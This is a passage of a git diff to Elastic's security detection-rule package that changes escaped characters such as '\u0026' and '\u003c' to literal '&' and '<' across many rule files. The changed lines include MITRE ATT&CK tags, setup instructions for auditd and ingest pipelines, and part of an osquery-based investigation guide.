\"/etc/modprobe.d/*\") and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"dpkg\", \"cp\", \"mkinitramfs\",\n \"readlink\") or process.title : \"*grep*\" or process.parent.pid == 1\n)\n", "required_fields": [ { @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json index a44724b7780..9f61b3a5755 100644 --- a/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json index 66a3874074b..ef636e5417d 100644 --- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json index 04b4e4e4675..71b42fe6cc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json index c06608ffc19..ab8496c8896 100644 --- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json index 962c972b2ab..d2a795d1289 100644 --- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json index daf79c2b372..675b59b2890 100644 --- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json index 0be338ea72f..8e5eea8946c 100644 --- a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json +++ b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json index 6d487432577..aa5bf600550 100644 --- a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json index 1dae7f4a998..f88bcdc8463 100644 --- a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json index 83be5f1da6b..9e97ed9967e 100644 --- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json index 9cbb457fd92..3affb901072 100644 --- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json index 10fe830243e..3642d21800d 100644 --- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json index df16ba210d8..0d447d5388f 100644 --- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json index 34a40cf100f..952f061d3c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json index 664e99ae8d7..2c9cbdfb1d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json +++ b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json index 3b6cdd7b41f..79a098da14b 100644 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json index d0ffe6ab704..bf9c555946e 100644 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json index 227badd06e4..c0dc8f04814 100644 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json index c0b9da25347..0d972787188 100644 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json index 6b04f41720d..b0bca300a85 100644 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json index 387f1f82bf5..9961b6a793c 100644 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json +++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json index 21b82ef885d..75ff10a5fbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json +++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json @@ -82,7 +82,7 @@ ], "risk_score": 47, "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", - "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json index 3bc6b8cdd3b..59620be5089 100644 --- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json +++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", - "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json index a9ed6f6905a..21f67f24743 100644 --- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json +++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", - "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json index aa51dec9b9e..443f706406d 100644 --- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json +++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json @@ -76,7 +76,7 @@ ], "risk_score": 47, "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", - "setup": "\nAudit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nAudit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json index aedb0ee93c1..362b68b7fd4 100644 --- a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json +++ b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json index ce7bf6ebfcc..a7991df1ae7 100644 --- a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json index 56eef466878..8c41959f1bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json index f7c19cdbf3b..b1d7696ce11 100644 --- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json index c1e28e7aadd..a7b02321c34 100644 --- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate 